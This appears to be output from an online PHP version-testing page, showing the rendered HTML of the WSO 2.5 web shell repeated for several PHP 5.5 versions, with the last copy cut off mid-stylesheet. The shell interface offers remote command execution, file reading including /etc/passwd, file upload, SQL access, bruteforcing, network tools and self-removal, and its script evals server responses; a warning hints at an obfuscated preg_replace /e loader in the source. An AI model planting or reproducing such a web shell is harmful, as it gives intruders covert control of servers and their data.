Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.30 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.29
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.29 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.28
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.28 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.27
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.5.27 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.5.26
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} 